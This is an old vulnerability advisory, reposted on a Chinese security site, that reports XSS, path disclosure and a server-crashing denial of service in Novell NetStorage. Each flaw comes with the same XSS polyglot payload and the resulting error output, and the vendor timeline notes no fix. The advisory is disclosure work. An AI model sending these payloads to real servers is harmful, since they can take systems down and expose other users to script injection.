首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Novell Netstorage suffers from cross site scripting and denial of service vulner
来源:mailto:bugsnothugs[at]gmail.com 作者:BugsNotHugs 发布时间:2009-03-30  
- Novell Netstorage Multiple Vulnerabilities

- Description

"Novell NetStorage acts as a bridge between a company's protected Novell network
and the Internet, providing protected file access from any Internet
location. Files
and folders on a Novell NetWare� 6.5 server or Novell Open Enterprise
Server can be
accessed using either a browser or via Network Neighborhood and Microsoft Web
Folders; no Novell Client^� software is required. Users can securely
access files
from any IP-enabled machine via Secure Sockets Layer (SSL) and Secure Hypertext
Transfer Protocol (HTTPS)."

Novell NetStorage contains a wide variety of vulnerabilities that may
allow an attacker
to cause a denial of service, gain configuration information or exploit other
users of the application.

#1 - Filter Field XSS

The 'filter' field does not sanitize user-supplied input. An attacker
could use this
to carry out cross-site scripting attacks against other authenticated users.

 ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->
</SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

#2 - Mail File Action Path Disclosure

On a file list, if a user right clicks a file, chooses the 'mail'
option and then
pastes script code in any field, the application will produce an error message
disclosing the installation path:

  Paste the following script:

';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--><
/SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

  Resulting error:

  OES:
    'file:/var/opt/novell/novlwww/email.xsl': (1): mismatched end tag:
expected "to" but got "SCRIPT"

  Netware:
    'file:/SYS:/tomcat/4/email.xsl': (1): mismatched end tag: expected
"subject" but got "SCRIPT"

#3 - File Attribute Malformed Input Server DoS

When interacting with files, a user can right click on the file and click
either 'NFS Info' or 'Netware Info'. Supplying script code into various fields
will cause the Netware server to abend and lock up.

Note: This was only tested on version 2.0.1 on netware 6.5 SP6, not OES.

The following script code causes the issue:

';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--><
/SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

- Product

Novell Inc., Netstorage, 3.1.5-19 on OES - 2.0.1 on netware 6.5 SP6

- Solution

None

- Timeline

2008-06-06: Vulnerability Discovered
2008-07-07: Disclosed to Vendor (no ack)
2008-10-05: Re-sent to Vendor (no ack)
2009-03-26: Disclosed to Public (no more playing nice)

-- 

BugsNotHugs
Shared Vulnerability Disclosure Account

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·pam-krb5 < 3.13 Local Privileg
·Wireshark <= 1.0.6 PN-DCP Form
·glFusion <= 1.1.2 COM_applyFil
·Sami HTTP Server 2.x (HEAD) Re
·PowerCHM 5.7 (hhp) Local Buffe
·Abee Chm eBook Creator 2.11 (F
·PowerCHM 5.7 (hhp File) Stack
·Amaya 11.1 W3C Editor/Browser
·Abee Chm Maker 1.9.5 (CMP File
·AtomixMP3 <= 2.3 (playlist) Un
·My Simple Forum 7.1 (LFI) Remo
·X-Forum 0.6.2 Remote Command E
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved